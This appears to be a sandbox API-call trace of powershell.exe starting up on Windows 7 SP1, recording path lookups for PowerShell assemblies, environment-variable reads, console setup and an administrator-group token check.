	[0598.300] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x26d5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0598.300] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x26d5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0599.657] CoTaskMemAlloc (cb=0x104) returned 0x44bd30
	[0599.657] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44bd30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0599.657] CoTaskMemFree (pv=0x44bd30) 
	[0599.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0599.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0599.660] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0599.668] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0602.677] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x26d6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0602.677] SetErrorMode (uMode=0x1) returned 0x1
	[0602.677] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x26d940 | out: lpFileInformation=0x26d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0602.677] SetErrorMode (uMode=0x1) returned 0x1
	[0609.350] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0609.350] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0609.350] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0609.353] CoTaskMemAlloc (cb=0x104) returned 0x44bd30
	[0609.353] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44bd30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0609.353] CoTaskMemFree (pv=0x44bd30) 
	[0609.357] CoTaskMemAlloc (cb=0x104) returned 0x44bd30
	[0609.357] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44bd30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0609.357] CoTaskMemFree (pv=0x44bd30) 
	[0609.357] CoTaskMemAlloc (cb=0x104) returned 0x44bd30
	[0609.357] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44bd30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0609.357] CoTaskMemFree (pv=0x44bd30) 
	[0609.360] CoCreateGuid (in: pguid=0x26dd08 | out: pguid=0x26dd08*(Data1=0x2cc800bb, Data2=0x81be, Data3=0x4786, Data4=([0]=0xb5, [1]=0xb, [2]=0x23, [3]=0x30, [4]=0x9c, [5]=0x66, [6]=0xc2, [7]=0xb4))) returned 0x0
	[0609.363] CoTaskMemAlloc (cb=0x104) returned 0x44bd30
	[0609.364] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44bd30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0609.364] CoTaskMemFree (pv=0x44bd30) 
	[0609.367] CoTaskMemAlloc (cb=0x104) returned 0x44bd30
	[0609.367] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44bd30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0609.367] CoTaskMemFree (pv=0x44bd30) 
	[0609.371] CoTaskMemAlloc (cb=0x104) returned 0x44bd30
	[0609.371] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44bd30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0609.371] CoTaskMemFree (pv=0x44bd30) 
	[0609.379] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0610.370] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x26d9b0 | out: lpConsoleScreenBufferInfo=0x26d9b0) returned 1
	[0610.378] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0610.378] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x26d9b0 | out: lpConsoleScreenBufferInfo=0x26d9b0) returned 1
	[0610.380] GetVersionExW (in: lpVersionInformation=0x26d940*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x26d940*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0610.382] GetCurrentProcess () returned 0xffffffffffffffff
	[0610.383] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x26d9d8 | out: TokenHandle=0x26d9d8*=0x31c) returned 1
	[0610.388] GetTokenInformation (in: TokenHandle=0x31c, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x26d8f8 | out: TokenInformation=0x0, ReturnLength=0x26d8f8) returned 0
	[0610.389] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3972e0
	[0610.389] GetTokenInformation (in: TokenHandle=0x31c, TokenInformationClass=0x8, TokenInformation=0x3972e0, TokenInformationLength=0x4, ReturnLength=0x26d8f8 | out: TokenInformation=0x3972e0, ReturnLength=0x26d8f8) returned 1
	[0610.391] DuplicateTokenEx (in: hExistingToken=0x31c, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x26da58 | out: phNewToken=0x26da58*=0x2e0) returned 1
	[0610.391] GetTokenInformation (in: TokenHandle=0x31c, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x26d8f8 | out: TokenInformation=0x0, ReturnLength=0x26d8f8) returned 0
	[0610.391] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x397290
	[0610.396] GetTokenInformation (in: TokenHandle=0x31c, TokenInformationClass=0x8, TokenInformation=0x397290, TokenInformationLength=0x4, ReturnLength=0x26d8f8 | out: TokenInformation=0x397290, ReturnLength=0x26d8f8) returned 1
	[0610.397] CheckTokenMembership (in: TokenHandle=0x2e0, SidToCheck=0x2e1c3b0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x26da68 | out: IsMember=0x26da68) returned 1
	[0610.397] CloseHandle (hObject=0x2e0) returned 1
	[0610.398] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0610.398] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0610.398] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0610.398] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0612.277] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0612.277] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0612.277] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0612.281] CoTaskMemAlloc (cb=0x804) returned 0x1ba49480
	[0612.281] GetConsoleTitleW (in: lpConsoleTitle=0x1ba49480, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0612.281] CoTaskMemFree (pv=0x1ba49480) 
	[0612.306] CoTaskMemAlloc (cb=0x804) returned 0x1ba49d30
	[0612.306] GetConsoleTitleW (in: lpConsoleTitle=0x1ba49d30, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0613.399] CoTaskMemFree (pv=0x1ba49d30) 
	[0613.403] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0613.403] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0613.403] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0613.414] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1
	[0614.685] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0614.685] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0614.685] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0614.685] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0615.434] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0615.437] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0615.437] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0615.438] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0615.438] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0615.438] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0615.443] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0615.443] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0615.444] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0615.444] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0616.859] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x320
	[0616.862] CoCreateGuid (in: pguid=0x26db50 | out: pguid=0x26db50*(Data1=0xcf20b534, Data2=0x3b94, Data3=0x4914, Data4=([0]=0x8d, [1]=0xfc, [2]=0x11, [3]=0x36, [4]=0x31, [5]=0x6, [6]=0xa4, [7]=0x56))) returned 0x0
	[0616.863] CoTaskMemAlloc (cb=0x104) returned 0x44bd30
	[0616.863] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44bd30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0616.863] CoTaskMemFree (pv=0x44bd30) 
	[0617.392] WinSqmIsOptedIn () returned 0x0
	[0617.393] CoTaskMemAlloc (cb=0x104) returned 0x44bd30
	[0617.393] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44bd30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0617.393] CoTaskMemFree (pv=0x44bd30) 
	[0617.394] CoTaskMemAlloc (cb=0x104) returned 0x44bd30
	[0617.394] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44bd30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0617.394] CoTaskMemFree (pv=0x44bd30) 
	[0617.394] CoTaskMemAlloc (cb=0x104) returned 0x44bd30
	[0617.394] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44bd30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0617.394] CoTaskMemFree (pv=0x44bd30) 
	[0617.395] CoTaskMemAlloc (cb=0x104) returned 0x44bd30
	[0617.395] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44bd30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0617.395] CoTaskMemFree (pv=0x44bd30) 
	[0617.396] CoTaskMemAlloc (cb=0x104) returned 0x44bd30
	[0617.396] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44bd30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0617.396] CoTaskMemFree (pv=0x44bd30) 
	[0617.397] CoTaskMemAlloc (cb=0x104) returned 0x44bd30
	[0617.397] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44bd30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0617.397] CoTaskMemFree (pv=0x44bd30) 
	[0617.397] CoTaskMemAlloc (cb=0x104) returned 0x44bd30
	[0617.398] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44bd30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0617.398] CoTaskMemFree (pv=0x44bd30) 
	[0617.398] CoTaskMemAlloc (cb=0x104) returned 0x44bd30
	[0617.398] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44bd30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0617.398] CoTaskMemFree (pv=0x44bd30) 
	[0617.403] CoTaskMemAlloc (cb=0x104) returned 0x44bd30
	[0617.403] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44bd30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0617.403] CoTaskMemFree (pv=0x44bd30) 
	[0617.408] CoTaskMemAlloc (cb=0x104) returned 0x44bd30
	[0617.408] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44bd30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0617.408] CoTaskMemFree (pv=0x44bd30) 
	[0617.408] CoTaskMemAlloc (cb=0x104) returned 0x44bd30
	[0617.409] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44bd30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0617.409] CoTaskMemFree (pv=0x44bd30) 
	[0617.409] CoTaskMemAlloc (cb=0x104) returned 0x44bd30
	[0617.409] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44bd30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0617.409] CoTaskMemFree (pv=0x44bd30) 
	[0621.764] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
